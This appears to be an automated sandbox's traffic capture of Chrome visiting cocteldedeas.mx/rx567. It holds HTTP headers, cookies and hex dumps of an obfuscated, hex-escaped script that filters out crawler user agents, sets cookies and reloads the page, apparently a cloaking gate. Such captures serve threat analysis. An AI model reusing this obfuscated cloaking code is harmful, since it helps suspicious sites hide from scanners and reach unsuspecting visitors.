                                                                              Cookie: -MRy1K2L2S2CnLEnrK9gU-VA9Ug=PskXfhJgru4qytMiKv068Q0xn-w; dlfFL1oUMLcOCnZI9Pr-CABRls4=1736541693; rnl56SFtG5TOo5DuwAMsjNJSgg4=1736628093; z7UG9wyEGxZKaKLkBT5htPzLjNI=8Jez4lB_IBbHDqZbQy6Fvn_EVBQ; Pp5f-cdR2ovPa-rlnOI2llLcQL0=24V5fd_SqGfynCsHmAJbl9ySndA; 8DQ6bV-yBfaqqQlKL56scO8tC2Q=1736541698; g4H-foKykfHJJhggqIe6T1TUqbg=1736628098; xMXu8kMhP2nWgiPnkh-v3z0m_pw=HwrWEDPJFMBTmFswmSpWLtgcorE
                                                                              Jan 10, 2025 21:41:40.260320902 CET1049INHTTP/1.1 301 Moved Permanently
                                                                              Date: Fri, 10 Jan 2025 20:41:40 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 167
                                                                              Connection: keep-alive
                                                                              Cache-Control: max-age=3600
                                                                              Expires: Fri, 10 Jan 2025 21:41:40 GMT
                                                                              Location: https://cocteldedeas.mx/rx567/
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ePd%2FRFfWqWb9Yb2BArliVbVxQkEbkGXDAymY9%2BdL98WC6Yi3G0FTgqZl4TKs3ma3UJKkc8FYTSWsAtvE2W0TeVp02tMGa3i5QPy6hPqtKjJmxiAYQHvPeX%2BYs0SasPNiPgQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Vary: Accept-Encoding
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fff7d3a4a0217ad-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1633&min_rtt=1633&rtt_var=816&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=858&delivery_rate=0&cwnd=170&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                              Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
                                                                              Jan 10, 2025 21:42:25.264106035 CET6OUTData Raw: 00
                                                                              Data Ascii:


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              0192.168.2.549717188.114.97.34432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:41:37 UTC663OUTGET /rx567 HTTP/1.1
                                                                              Host: cocteldedeas.mx
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Upgrade-Insecure-Requests: 1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: navigate
                                                                              Sec-Fetch-User: ?1
                                                                              Sec-Fetch-Dest: document
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-10 20:41:37 UTC1349INHTTP/1.1 503 Service Temporarily Unavailable
                                                                              Date: Fri, 10 Jan 2025 20:41:37 GMT
                                                                              Content-Type: text/html; charset=utf-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-XSS-Protection: 1; mode=block
                                                                              Set-Cookie: -MRy1K2L2S2CnLEnrK9gU-VA9Ug=PskXfhJgru4qytMiKv068Q0xn-w; path=/; expires=Sat, 11-Jan-25 20:41:33 GMT; Max-Age=86400;
                                                                              Set-Cookie: dlfFL1oUMLcOCnZI9Pr-CABRls4=1736541693; path=/; expires=Sat, 11-Jan-25 20:41:33 GMT; Max-Age=86400;
                                                                              Set-Cookie: rnl56SFtG5TOo5DuwAMsjNJSgg4=1736628093; path=/; expires=Sat, 11-Jan-25 20:41:33 GMT; Max-Age=86400;
                                                                              Set-Cookie: z7UG9wyEGxZKaKLkBT5htPzLjNI=8Jez4lB_IBbHDqZbQy6Fvn_EVBQ; path=/; expires=Sat, 11-Jan-25 20:41:33 GMT; Max-Age=86400;
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Cache-Control: public, max-age=0 no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              Expires: 0
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VlafJHtsUmyUp7L1Yu7FSOtYQDJZsG3y6b%2BKYn9%2BmAvXbl3d0eoy8UEerLi7lDT4s1%2F%2BJQw9Hdoyl4tCx5CQ%2FfMX4VIzqs51C0063lOkAJCKFGlPgkzneMluKrBUVKPqJ2Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fff7d2a791743c7-EWR
                                                                              2025-01-10 20:41:37 UTC246INData Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 38 31 32 26 6d 69 6e 5f 72 74 74 3d 31 38 30 37 26 72 74 74 5f 76 61 72 3d 36 38 39 26 73 65 6e 74 3d 35 26 72 65 63 76 3d 36 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 33 38 26 72 65 63 76 5f 62 79 74 65 73 3d 31 32 34 31 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 35 37 36 36 37 33 26 63 77 6e 64 3d 32 31 39 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 35 38 64 33 38 65 61 36 30 34 34 39 37 30 39 37 26 74 73 3d 33 38 32 26 78 3d 30 22 0d 0a 0d 0a
                                                                              Data Ascii: alt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1812&min_rtt=1807&rtt_var=689&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1241&delivery_rate=1576673&cwnd=219&unsent_bytes=0&cid=58d38ea604497097&ts=382&x=0"
                                                                              2025-01-10 20:41:37 UTC1369INData Raw: 33 34 30 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d
                                                                              Data Ascii: 340b<!DOCTYPE html><html><head><meta charset="utf-8" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" /><meta name="viewport" content="width=device-width, initial-
                                                                              2025-01-10 20:41:37 UTC1369INData Raw: 36 33 5c 78 36 38 5c 78 34 35 5c 78 37 36 5c 78 36 35 5c 78 36 45 5c 78 37 34 5c 78 32 38 5c 78 32 32 5c 78 36 46 5c 78 36 45 5c 78 37 32 5c 78 36 35 5c 78 36 31 5c 78 36 34 5c 78 37 39 5c 78 37 33 5c 78 37 34 5c 78 36 31 5c 78 37 34 5c 78 36 35 5c 78 36 33 5c 78 36 38 5c 78 36 31 5c 78 36 45 5c 78 36 37 5c 78 36 35 5c 78 32 32 5c 78 32 43 5c 78 32 30 5c 78 36 32 5c 78 32 39 5c 78 37 44 5c 78 33 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 36 32 5c 78 32 38 5c 78 36 36 5c 78 37 35 5c 78 36 45 5c 78 36 33 5c 78 37 34 5c 78 36 39 5c 78 36 46 5c 78 36 45 5c 78 32 38 5c 78 32 39 5c 78 37 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
                                                                              Data Ascii: 63\x68\x45\x76\x65\x6E\x74\x28\x22\x6F\x6E\x72\x65\x61\x64\x79\x73\x74\x61\x74\x65\x63\x68\x61\x6E\x67\x65\x22\x2C\x20\x62\x29\x7D\x3B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x62\x28\x66\x75\x6E\x63\x74\x69\x6F\x6E\x28\x29\x7B\x0A\x20\x20\x20\x20\x20\x20\x20\
                                                                              2025-01-10 20:41:37 UTC1369INData Raw: 37 5c 78 33 42 5c 78 32 30 5c 78 36 35 5c 78 37 38 5c 78 37 30 5c 78 36 39 5c 78 37 32 5c 78 36 35 5c 78 37 33 5c 78 33 44 5c 78 32 37 5c 78 32 30 5c 78 32 42 5c 78 32 30 5c 78 32 37 5c 78 35 33 5c 78 36 31 5c 78 37 34 5c 78 32 43 5c 78 32 30 5c 78 33 31 5c 78 33 31 5c 78 32 44 5c 78 34 41 5c 78 36 31 5c 78 36 45 5c 78 32 44 5c 78 33 32 5c 78 33 35 5c 78 32 30 5c 78 33 32 5c 78 33 30 5c 78 33 41 5c 78 33 34 5c 78 33 31 5c 78 33 41 5c 78 33 33 5c 78 33 37 5c 78 32 30 5c 78 34 37 5c 78 34 44 5c 78 35 34 5c 78 32 37 5c 78 32 30 5c 78 32 42 5c 78 32 30 5c 78 32 37 5c 78 33 42 5c 78 32 30 5c 78 37 30 5c 78 36 31 5c 78 37 34 5c 78 36 38 5c 78 33 44 5c 78 32 46 5c 78 32 37 5c 78 33 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78
                                                                              Data Ascii: 7\x3B\x20\x65\x78\x70\x69\x72\x65\x73\x3D\x27\x20\x2B\x20\x27\x53\x61\x74\x2C\x20\x31\x31\x2D\x4A\x61\x6E\x2D\x32\x35\x20\x32\x30\x3A\x34\x31\x3A\x33\x37\x20\x47\x4D\x54\x27\x20\x2B\x20\x27\x3B\x20\x70\x61\x74\x68\x3D\x2F\x27\x3B\x0A\x20\x20\x20\x20\x20\x
                                                                              2025-01-10 20:41:37 UTC1369INData Raw: 5c 78 30 41 5c 78 36 39 5c 78 36 36 5c 78 32 38 5c 78 32 31 5c 78 37 37 5c 78 36 39 5c 78 36 45 5c 78 36 34 5c 78 36 46 5c 78 37 37 5c 78 32 45 5c 78 36 35 5c 78 36 44 5c 78 36 39 5c 78 37 34 5c 78 32 39 5c 78 37 42 5c 78 32 46 5c 78 32 41 5c 78 36 33 5c 78 36 46 5c 78 37 35 5c 78 36 33 5c 78 36 38 5c 78 36 41 5c 78 37 33 5c 78 32 41 5c 78 32 46 5c 78 30 41 5c 78 36 39 5c 78 36 36 5c 78 32 38 5c 78 32 31 5c 78 37 37 5c 78 36 39 5c 78 36 45 5c 78 36 34 5c 78 36 46 5c 78 37 37 5c 78 32 45 5c 78 37 33 5c 78 37 30 5c 78 36 31 5c 78 37 37 5c 78 36 45 5c 78 32 39 5c 78 37 42 5c 78 32 46 5c 78 32 41 5c 78 37 32 5c 78 36 38 5c 78 36 39 5c 78 36 45 5c 78 36 46 5c 78 32 41 5c 78 32 46 5c 78 30 41 5c 78 36 39 5c 78 36 36 5c 78 32 38 5c 78 32 31 5c 78 37 37 5c 78 36
                                                                              Data Ascii: \x0A\x69\x66\x28\x21\x77\x69\x6E\x64\x6F\x77\x2E\x65\x6D\x69\x74\x29\x7B\x2F\x2A\x63\x6F\x75\x63\x68\x6A\x73\x2A\x2F\x0A\x69\x66\x28\x21\x77\x69\x6E\x64\x6F\x77\x2E\x73\x70\x61\x77\x6E\x29\x7B\x2F\x2A\x72\x68\x69\x6E\x6F\x2A\x2F\x0A\x69\x66\x28\x21\x77\x6
                                                                              2025-01-10 20:41:37 UTC1369INData Raw: 78 37 43 5c 78 36 31 5c 78 36 43 5c 78 36 35 5c 78 37 38 5c 78 36 31 5c 78 37 43 5c 78 36 39 5c 78 36 31 5c 78 35 46 5c 78 36 31 5c 78 37 32 5c 78 36 33 5c 78 36 38 5c 78 36 39 5c 78 37 36 5c 78 36 35 5c 78 37 32 5c 78 37 43 5c 78 36 36 5c 78 36 31 5c 78 36 33 5c 78 36 35 5c 78 36 32 5c 78 36 46 5c 78 36 46 5c 78 36 42 5c 78 37 43 5c 78 37 34 5c 78 37 37 5c 78 36 39 5c 78 37 34 5c 78 37 34 5c 78 36 35 5c 78 37 32 5c 78 37 43 5c 78 36 43 5c 78 36 39 5c 78 36 45 5c 78 36 42 5c 78 36 35 5c 78 36 34 5c 78 36 39 5c 78 36 45 5c 78 37 43 5c 78 37 30 5c 78 36 39 5c 78 36 45 5c 78 36 37 5c 78 36 34 5c 78 36 46 5c 78 36 44 5c 78 32 46 5c 78 36 39 5c 78 32 45 5c 78 37 34 5c 78 36 35 5c 78 37 33 5c 78 37 34 5c 78 32 38 5c 78 36 45 5c 78 36 31 5c 78 37 36 5c 78 36 39
                                                                              Data Ascii: x7C\x61\x6C\x65\x78\x61\x7C\x69\x61\x5F\x61\x72\x63\x68\x69\x76\x65\x72\x7C\x66\x61\x63\x65\x62\x6F\x6F\x6B\x7C\x74\x77\x69\x74\x74\x65\x72\x7C\x6C\x69\x6E\x6B\x65\x64\x69\x6E\x7C\x70\x69\x6E\x67\x64\x6F\x6D\x2F\x69\x2E\x74\x65\x73\x74\x28\x6E\x61\x76\x69
                                                                              2025-01-10 20:41:37 UTC1369INData Raw: 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 46 5c 78 32 41 5c 78 37 44 5c 78 32 41 5c 78 32 46 5c 78 30 41 5c 78 32 46 5c 78 32 41 5c 78 37 44 5c 78 32 41 5c 78 32 46 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 32 46 5c 78 32 41 5c 78 37 44 5c 78 32 41 5c 78 32 46 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 37 44 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c
                                                                              Data Ascii: 20\x20\x20\x20\x20\x20\x2F\x2A\x7D\x2A\x2F\x0A\x2F\x2A\x7D\x2A\x2F\x0A\x7D\x0A\x2F\x2A\x7D\x2A\x2F\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x7D\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\
                                                                              2025-01-10 20:41:37 UTC1369INData Raw: 46 5c 78 32 30 5c 78 34 33 5c 78 36 38 5c 78 36 35 5c 78 36 33 5c 78 36 42 5c 78 32 30 5c 78 36 39 5c 78 36 36 5c 78 32 30 5c 78 37 34 5c 78 36 38 5c 78 36 35 5c 78 32 30 5c 78 36 36 5c 78 36 46 5c 78 37 32 5c 78 36 44 5c 78 32 30 5c 78 36 35 5c 78 37 38 5c 78 36 39 5c 78 37 33 5c 78 37 34 5c 78 37 33 5c 78 32 30 5c 78 36 31 5c 78 36 45 5c 78 36 34 5c 78 32 30 5c 78 36 39 5c 78 36 36 5c 78 32 30 5c 78 36 39 5c 78 37 34 5c 78 32 30 5c 78 36 38 5c 78 36 31 5c 78 37 33 5c 78 32 30 5c 78 36 39 5c 78 36 45 5c 78 37 30 5c 78 37 35 5c 78 37 34 5c 78 32 30 5c 78 36 35 5c 78 36 43 5c 78 36 35 5c 78 36 44 5c 78 36 35 5c 78 36 45 5c 78 37 34 5c 78 37 33 5c 78 30 41 5c 78 36 39 5c 78 36 36 5c 78 32 30 5c 78 32 38 5c 78 36 36 5c 78 36 39 5c 78 37 32 5c 78 37 33 5c 78
                                                                              Data Ascii: F\x20\x43\x68\x65\x63\x6B\x20\x69\x66\x20\x74\x68\x65\x20\x66\x6F\x72\x6D\x20\x65\x78\x69\x73\x74\x73\x20\x61\x6E\x64\x20\x69\x66\x20\x69\x74\x20\x68\x61\x73\x20\x69\x6E\x70\x75\x74\x20\x65\x6C\x65\x6D\x65\x6E\x74\x73\x0A\x69\x66\x20\x28\x66\x69\x72\x73\x
                                                                              2025-01-10 20:41:37 UTC1369INData Raw: 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 37 37 5c 78 36 39 5c 78 36 45 5c 78 36 34 5c 78 36 46 5c 78 37 37 5c 78 32 45 5c 78 36 43 5c 78 36 46 5c 78 36 33 5c 78 36 31 5c 78 37 34 5c 78 36 39 5c 78 36 46 5c 78 36 45 5c 78 32 45 5c 78 36 38 5c 78 37 32 5c 78 36 35 5c 78 36 36 5c 78 32 30 5c 78 33 44 5c 78 32 30 5c 78 37 37 5c 78 36 39 5c 78 36 45 5c 78 36 34 5c 78 36 46 5c 78 37 37 5c 78 32 45 5c 78 36 43 5c 78 36 46 5c 78 36 33 5c 78 36 31 5c 78 37 34 5c 78 36 39 5c 78 36 46 5c 78 36 45 5c 78 32 45 5c 78 36 38 5c 78 37 32 5c 78 36 35 5c 78 36 36 5c 78 33 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32
                                                                              Data Ascii: \x20\x20\x20\x20\x20\x20\x77\x69\x6E\x64\x6F\x77\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x20\x3D\x20\x77\x69\x6E\x64\x6F\x77\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x3B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2
                                                                              2025-01-10 20:41:37 UTC1369INData Raw: 78 37 37 5c 78 32 45 5c 78 36 43 5c 78 36 46 5c 78 36 33 5c 78 36 31 5c 78 37 34 5c 78 36 39 5c 78 36 46 5c 78 36 45 5c 78 32 45 5c 78 36 38 5c 78 37 32 5c 78 36 35 5c 78 36 36 5c 78 33 42 5c 78 30 41 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 32 30 5c 78 37 44 5c 78 32 30 5c 78 36 35 5c 78 36 43 5c 78 37 33 5c 78 36 35 5c 78 32 30
                                                                              Data Ascii: x77\x2E\x6C\x6F\x63\x61\x74\x69\x6F\x6E\x2E\x68\x72\x65\x66\x3B\x0A\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7D\x20\x65\x6C\x73\x65\x20


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              1192.168.2.549718188.114.97.34432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:41:38 UTC1107OUTPOST /rx567 HTTP/1.1
                                                                              Host: cocteldedeas.mx
                                                                              Connection: keep-alive
                                                                              Content-Length: 22
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              X-Requested-TimeStamp-Expire:
                                                                              7FSfy0fuJdl6efuyHLNjDVp1sU: 29262134
                                                                              sec-ch-ua-mobile: ?0
                                                                              X-Requested-TimeStamp-Combination:
                                                                              X-Requested-Type-Combination: GET
                                                                              Content-type: application/x-www-form-urlencoded
                                                                              X-Requested-Type: GET
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              X-Requested-with: XMLHttpRequest
                                                                              X-Requested-TimeStamp:
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Origin: https://cocteldedeas.mx
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://cocteldedeas.mx/rx567
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              Cookie: -MRy1K2L2S2CnLEnrK9gU-VA9Ug=PskXfhJgru4qytMiKv068Q0xn-w; dlfFL1oUMLcOCnZI9Pr-CABRls4=1736541693; rnl56SFtG5TOo5DuwAMsjNJSgg4=1736628093; z7UG9wyEGxZKaKLkBT5htPzLjNI=8Jez4lB_IBbHDqZbQy6Fvn_EVBQ; Pp5f-cdR2ovPa-rlnOI2llLcQL0=24V5fd_SqGfynCsHmAJbl9ySndA
                                                                              2025-01-10 20:41:38 UTC22OUTData Raw: 6e 61 6d 65 31 3d 48 65 6e 72 79 26 6e 61 6d 65 32 3d 46 6f 72 64
                                                                              Data Ascii: name1=Henry&name2=Ford
                                                                              2025-01-10 20:41:38 UTC1326INHTTP/1.1 204 No Content
                                                                              Date: Fri, 10 Jan 2025 20:41:38 GMT
                                                                              Connection: close
                                                                              X-Content-Type-Options: nosniff
                                                                              X-Content-Type-Options: nosniff
                                                                              X-XSS-Protection: 1; mode=block
                                                                              X-XSS-Protection: 1; mode=block
                                                                              Set-Cookie: Pp5f-cdR2ovPa-rlnOI2llLcQL0=24V5fd_SqGfynCsHmAJbl9ySndA; path=/; expires=Sat, 11-Jan-25 20:41:38 GMT; Max-Age=86400;
                                                                              Set-Cookie: 8DQ6bV-yBfaqqQlKL56scO8tC2Q=1736541698; path=/; expires=Sat, 11-Jan-25 20:41:38 GMT; Max-Age=86400;
                                                                              Set-Cookie: g4H-foKykfHJJhggqIe6T1TUqbg=1736628098; path=/; expires=Sat, 11-Jan-25 20:41:38 GMT; Max-Age=86400;
                                                                              Set-Cookie: xMXu8kMhP2nWgiPnkh-v3z0m_pw=HwrWEDPJFMBTmFswmSpWLtgcorE; path=/; expires=Sat, 11-Jan-25 20:41:38 GMT; Max-Age=86400;
                                                                              X-Frame-Options: SAMEORIGIN
                                                                              Cache-Control: public, max-age=0 no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              Pragma: no-cache
                                                                              Expires: 0
                                                                              X-Server-Powered-By: Engintron
                                                                              cf-cache-status: DYNAMIC
                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L2FgUe7ZWxo4z2UTCc%2Bl%2FaQXTQKKIu9Rw9GGgHcuJiBYUr2tw1h%2Fd4ByS2zIGUqHG7BM7DeQjLD3IWftyEU2z9eNdw4xLh1yGSjB%2BpHgsa0JiuHRo77p%2B%2Fb4so%2F9L9w3mQk%3D"}],"group":"cf-nel","max_age":604800}
                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                              Server: cloudflare
                                                                              CF-RAY: 8fff7d2e1d3542db-EWR
                                                                              alt-svc: h3=":443"; ma=86400
                                                                              2025-01-10 20:41:38 UTC216INData Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 37 37 33 26 6d 69 6e 5f 72 74 74 3d 31 37 36 37 26 72 74 74 5f 76 61 72 3d 36 37 34 26 73 65 6e 74 3d 36 26 72 65 63 76 3d 38 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 33 38 26 72 65 63 76 5f 62 79 74 65 73 3d 31 37 32 39 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 31 36 30 38 38 31 35 26 63 77 6e 64 3d 32 31 35 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 66 30 63 62 66 35 34 64 35 31 37 31 61 66 35 33 26 74 73 3d 39 32 31 26 78 3d 30 22 0d 0a 0d 0a
                                                                              Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=1773&min_rtt=1767&rtt_var=674&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1729&delivery_rate=1608815&cwnd=215&unsent_bytes=0&cid=f0cbf54d5171af53&ts=921&x=0"


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              2192.168.2.54971935.190.80.14432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:41:38 UTC540OUTOPTIONS /report/v4?s=VlafJHtsUmyUp7L1Yu7FSOtYQDJZsG3y6b%2BKYn9%2BmAvXbl3d0eoy8UEerLi7lDT4s1%2F%2BJQw9Hdoyl4tCx5CQ%2FfMX4VIzqs51C0063lOkAJCKFGlPgkzneMluKrBUVKPqJ2Q%3D HTTP/1.1
                                                                              Host: a.nel.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Origin: https://cocteldedeas.mx
                                                                              Access-Control-Request-Method: POST
                                                                              Access-Control-Request-Headers: content-type
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2025-01-10 20:41:38 UTC336INHTTP/1.1 200 OK
                                                                              Content-Length: 0
                                                                              access-control-max-age: 86400
                                                                              access-control-allow-methods: OPTIONS, POST
                                                                              access-control-allow-origin: *
                                                                              access-control-allow-headers: content-length, content-type
                                                                              date: Fri, 10 Jan 2025 20:41:38 GMT
                                                                              Via: 1.1 google
                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              3192.168.2.549723188.114.97.34432848C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2025-01-10 20:41:39 UTC1112OUTGET /rx567 HTTP/1.1
                                                                              Host: cocteldedeas.mx
